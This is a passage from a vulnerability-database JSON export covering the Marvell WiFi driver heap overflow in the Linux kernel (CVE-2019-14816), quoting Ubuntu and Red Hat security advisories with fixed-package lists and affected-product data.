        "id": "CNNVD-200105-038"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2002-12-12T00:00:00",
        "db": "CERT/CC",
        "id": "VU#290140"
      },
      {
        "date": "2003-05-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#13877"
      },
      {
        "date": "2002-03-05T00:00:00",
        "db": "CERT/CC",
        "id": "VU#25309"
      },
      {
        "date": "2003-05-20T00:00:00",
        "db": "CERT/CC",
        "id": "VU#945216"
      },
      {
        "date": "2002-01-15T00:00:00",
        "db": "CERT/CC",
        "id": "VU#566640"
      },
      {
        "date": "2001-06-26T00:00:00",
        "db": "CERT/CC",
        "id": "VU#651994"
      },
      {
        "date": "2002-03-05T00:00:00",
        "db": "CERT/CC",
        "id": "VU#315308"
      },
      {
        "date": "2001-02-08T00:00:00",
        "db": "BID",
        "id": "2347"
      },
      {
        "date": "2002-06-27T00:00:00",
        "db": "BID",
        "id": "5114"
      },
      {
        "date": "2001-02-20T00:00:00",
        "db": "BID",
        "id": "2405"
      },
      {
        "date": "2017-10-10T01:29:40.687000",
        "db": "NVD",
        "id": "CVE-2001-0317"
      },
      {
        "date": "2005-05-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "2405"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200105-038"
      }
    ],
    "trust": 0.9
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Multiple Cisco products consume excessive CPU resources in response to large SSH packets",
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#290140"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Failure to Handle Exceptional Conditions",
    "sources": [
      {
        "db": "BID",
        "id": "5114"
      },
      {
        "db": "BID",
        "id": "2405"
      }
    ],
    "trust": 0.6
  }
}

var-201909-1526
Vulnerability from variot

There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. Linux Kernel Contains a classic buffer overflow vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ========================================================================= Ubuntu Security Notice USN-4162-2 October 23, 2019

linux-azure vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux kernel for Microsoft Azure Cloud systems for Ubuntu 14.04 ESM.

It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2019-14814, CVE-2019-14815, CVE-2019-14816)

Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel did not properly validate device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15117)

Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel improperly performed recursion while handling device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15118)

It was discovered that the Technisat DVB-S/S2 USB device driver in the Linux kernel contained a buffer overread. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2019-15505)

Brad Spengler discovered that a Spectre mitigation was improperly implemented in the ptrace susbsystem of the Linux kernel. A local attacker could possibly use this to expose sensitive information. (CVE-2019-15902)

It was discovered that the SMB networking file system implementation in the Linux kernel contained a buffer overread. An attacker could use this to expose sensitive information (kernel memory). (CVE-2019-15918)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 ESM: linux-image-4.15.0-1061-azure 4.15.0-1061.66~14.04.1 linux-image-azure 4.15.0.1061.47

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2020:0374-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2020:0374 Issue date: 2020-02-04 CVE Names: CVE-2019-14816 CVE-2019-14895 CVE-2019-14898 CVE-2019-14901 CVE-2019-17133 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • kernel: heap overflow in mwifiex_update_vs_ie() function of Marvell WiFi driver (CVE-2019-14816)

  • kernel: heap-based buffer overflow in mwifiex_process_country_ie() function in drivers/net/wireless/marvell/mwifiex/sta_ioctl.c (CVE-2019-14895)

  • kernel: heap overflow in marvell/mwifiex/tdls.c (CVE-2019-14901)

  • kernel: buffer overflow in cfg80211_mgd_wext_giwessid in net/wireless/wext-sme.c (CVE-2019-17133)

  • kernel: incomplete fix for race condition between mmget_not_zero()/get_task_mm() and core dumping in CVE-2019-11599 (CVE-2019-14898)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • [Azure][7.8] Include patch "PCI: hv: Avoid use of hv_pci_dev->pci_slot after freeing it" (BZ#1766089)

  • [Hyper-V][RHEL7.8] When accelerated networking is enabled on RedHat, network interface(eth0) moved to new network namespace does not obtain IP address. (BZ#1766093)

  • [Azure][RHEL 7.6] hv_vmbus probe pass-through GPU card failed (BZ#1766097)

  • SMB3: Do not error out on large file transfers if server responds with STATUS_INSUFFICIENT_RESOURCES (BZ#1767621)

  • Since RHEL commit 5330f5d09820 high load can cause dm-multipath path failures (BZ#1770113)

  • Hard lockup in free_one_page()->_raw_spin_lock() because sosreport command is reading from /proc/pagetypeinfo (BZ#1770732)

  • patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() (BZ#1772812)

  • fix compat statfs64() returning EOVERFLOW for when _FILE_OFFSET_BITS=64 (BZ#1775678)

  • Guest crash after load cpuidle-haltpoll driver (BZ#1776289)

  • RHEL 7.7 long I/O stalls with bnx2fc from not masking off scope bits of retry delay value (BZ#1776290)

  • Multiple "mv" processes hung on a gfs2 filesystem (BZ#1777297)

  • Moving Egress IP will result in conntrack sessions being DESTROYED (BZ#1779564)

  • core: backports from upstream (BZ#1780033)

  • kernel BUG at arch/powerpc/platforms/pseries/lpar.c:482! (BZ#1780148)

  • Race between tty_open() and flush_to_ldisc() using the tty_struct->driver_data field. (BZ#1780163)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

ppc64: bpftool-3.10.0-1062.12.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm perf-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm

ppc64le: bpftool-3.10.0-1062.12.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm perf-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm

s390x: bpftool-3.10.0-1062.12.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm kernel-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-headers-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm perf-3.10.0-1062.12.1.el7.s390x.rpm perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm python-perf-3.10.0-1062.12.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm

x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm

ppc64le: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm

x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-1062.12.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm

x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2019-14816 https://access.redhat.com/security/cve/CVE-2019-14895 https://access.redhat.com/security/cve/CVE-2019-14898 https://access.redhat.com/security/cve/CVE-2019-14901 https://access.redhat.com/security/cve/CVE-2019-17133 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2020 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK kzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry plZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg 9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6 q6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7 DfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI EOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz hTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci N0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh wqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz hk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6 IwzrfQ6EsXE= =mofI -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Please note that the RDS protocol is blacklisted in Ubuntu by default. 7.3) - noarch, x86_64

Bug Fix(es):

  • RHEL7.5 - kernel crashed at xfs_reclaim_inodes_count+0x70/0xa0 (BZ#1795578)

  • Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

Bug Fix(es):

  • patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt] (BZ#1772522)

  • kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)

  • kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency requirement (BZ#1781157)

  • kernel-rt: hard lockup panic in during execution of CFS bandwidth period timer (BZ#1788057)

Bug Fix(es):

  • [xfstests]: copy_file_range cause corruption on rhel-7 (BZ#1797965)

  • port show-kabi to python3 (BZ#1806926)

  • 7.6) - ppc64, ppc64le, x86_64

Bug Fix(es):

  • [PATCH] perf: Fix a race between ring_buffer_detach() and ring_buffer_wakeup() (BZ#1772826)

  • core: backports from upstream (BZ#1780031)

  • Race between tty_open() and flush_to_ldisc() using the tty_struct->driver_data field. (BZ#1780160)

  • [Hyper-V][RHEL7.6]Hyper-V guest waiting indefinitely for RCU callback when removing a mem cgroup (BZ#1783176)

Enhancement(s):

  • Selective backport: perf: Sync with upstream v4.16 (BZ#1782752)

4

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201909-1526",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "data availability services",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.15"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "enterprise linux eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux compute node eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "a800",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.14.146"
      },
      {
        "model": "enterprise linux for real time for nfv tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.9.194"
      },
      {
        "model": "a220",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.20"
      },
      {
        "model": "enterprise linux for real time for nfv",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "6.4"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.3"
      },
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "3.17"
      },
      {
        "model": "virtualization",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "4.2"
      },
      {
        "model": "enterprise linux server tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.0"
      },
      {
        "model": "enterprise linux for real time tus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "8.4"
      },
      {
        "model": "enterprise linux for power big endian eus",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "redhat",
        "version": "7.6_ppc64"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
